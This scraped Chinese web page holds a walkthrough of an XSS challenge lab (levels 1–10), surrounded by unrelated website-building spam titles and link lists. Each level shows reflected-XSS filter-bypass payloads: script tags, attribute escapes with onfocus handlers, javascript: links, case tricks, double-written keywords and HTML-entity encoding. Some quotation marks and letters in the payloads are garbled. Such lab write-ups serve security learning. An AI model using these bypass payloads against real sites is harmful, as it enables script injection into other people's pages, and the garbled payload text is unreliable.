当前位置: 首页 > news >正文

成都旅游网站建设规划方案哪个推广平台推广最靠谱

成都旅游网站建设规划方案,哪个推广平台推广最靠谱,赣州市南康建设局网站,高站网站建设简介 XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。…

简介

XSS挑战赛,里面包含了各种XSS的防御方式和绕过方式,好好掌握里面的绕过细节,有助于我们更好的去发现XSS漏洞以及XSS的防御。本文更多的是分享解析的细节,不是一个标准的答案,希望大家在渗透的时候有更多的思维。

挑战开始

Level1

通关过程

在这里插入图片描述
第一关总的来说,比较简单,直接先尝试:
在这里插入图片描述

payload

<script>alert(1)</script>

Level2

通关过程

直接尝试payload:
在这里插入图片描述
查看源码:
在这里插入图片描述
想办法去逃逸输入框:
在这里插入图片描述
在这里插入图片描述

payload

a"><script>alert(1)</script>

Level3

通关过程

直接尝试:
在这里插入图片描述
发现没有弹窗,审核源码:
在这里插入图片描述
到这里说明,不能再输入标签了,所以需要转换思路,这个地方标签不行,那我们就尝试事件,这个地方考虑使用onfocus事件:’ οnfοcus='alert(1)
这个单引号就是为了闭合value的单引号。
在这里插入图片描述

paylaod

' οnfοcus='alert(1)

Level4

通关过程

直接尝试:
在这里插入图片描述
分析源码:感觉和第三关思路一致
在这里插入图片描述
尝试: " οnfοcus="alert(1)
在这里插入图片描述

payload

" οnfοcus="alert(1)

Level5

通关过程

直接尝试:
在这里插入图片描述
意味着不能输入script标签了,换思路,用事件:" οnfοcus="alert(1)
在这里插入图片描述
考虑这个地方有没有可能是个黑名单机制呢?换不常用的事件:
在这里插入图片描述
看来过滤的比较讲究,那么我们试试逃逸输入框,用其他标签来试试:
">jack
在这里插入图片描述
点击通关:
在这里插入图片描述

payoad

"><a href="javascript:alert(1)">jack</a>

Level6

通关过程

直接尝试:
在这里插入图片描述
直接尝试:">jack

在这里插入图片描述
在这里插入图片描述
尝试大小写绕过:">jack
在这里插入图片描述
在这里插入图片描述

payload

"><a HrEf="javascript:alert(1)">jack</a>

Level7

通关过程

直接尝试:
在这里插入图片描述
双写?alert(1)
在这里插入图片描述在这里插入图片描述
尝试:">alert(1)

在这里插入图片描述

payload

"><scrscriptipt>alert(1)</scscriptript>

Level8

通关过程

直接尝试:
在这里插入图片描述
看源码:
在这里插入图片描述
那么伪协议?
javascript:alert(1)
在这里插入图片描述
这个地方多半对事件也进行了处理,双写就不用试了,因为没有删除关键字
考虑到unicode是支持所有的编码,那么转成这个编码看行不行:
在这里插入图片描述
所以直接尝试:
在这里插入图片描述

payload

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

Level9

通关过程

直接尝试:
在这里插入图片描述
需要一个合法链接?
那么输入:javascript:alert(1);//http://www.baidu.com
在这里插入图片描述
还是被处理了,那么用和8关相同的编码试试:
javascript:alert(1)//http://www.baidu.com

在这里插入图片描述

payload

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://www.baidu.com

Level10

通关过程

直接尝试:
在这里插入图片描述
看来被实体化了。看源码:
在这里插入图片描述
尝试着传递这几个隐藏域的值:
在这里插入图片描述
构造逃逸:t_sort=a" οnfοcus=“alert(1)”>
在这里插入图片描述
继续构造:t_sort=a" οnfοcus=“alert(1)” type="text
在这里插入图片描述

payload

&t_sort=a" οnfοcus="alert(1)" type="text
http://www.ds6.com.cn/news/94081.html

相关文章:

  • 万户网站制作北京网络营销公司哪家好
  • 音乐分享网站开发搜索引擎营销的案例有哪些
  • 拓者室内设计吧官网南阳网站seo
  • 北京住房与城乡建设委员会网站市场推广怎么写
  • 江西中国建设银行网站首页seo关键词优化软件手机
  • 网站技术支持 新锐网络媒体广告投放平台
  • 提供手机网站怎么做杭州网站关键词排名优化
  • 做外贸网站如何网店如何营销推广
  • 做微网站用哪个平台推广竞价托管费用
  • 广州网站 制作信科便宜百度网页版怎么切换
  • 怎么用Visio studio做网站网络广告公司
  • 网站建设人员架构广告投放方案
  • html做旅游网站网站关键词优化排名公司
  • 中国邮政做特产得网站合肥网站优化软件
  • 公司网站建设系统武汉刚刚发生的新闻
  • 武汉做网站的培训机构网站设计公司报价
  • 最好看免费视频宁波seo网络推广咨询热线
  • 免费企业网站模板psd成都seo排名
  • 做购物网站 国外服务器app拉新一手渠道
  • 做的网站必须放哪家网站优化公司好
  • 松江网站建设h ben百度推广优化中心
  • 网站开发作品短网址生成器免费
  • 做网站 php pythonseo在线优化排名
  • 手机网站一般宽度做多大的郴州网络推广公司排名
  • 对于网站链接优化有哪些建议网络广告营销案例有哪些
  • 武侯区建设局网站广告传媒公司主要做什么
  • 政企网站建设宁波网站推广优化哪家正规
  • 南昌seo站内优化郑州网站建设价格
  • 福田做棋牌网站建设哪家好西安网站制作费用
  • 政府网站建设原因刚刚中国宣布重大消息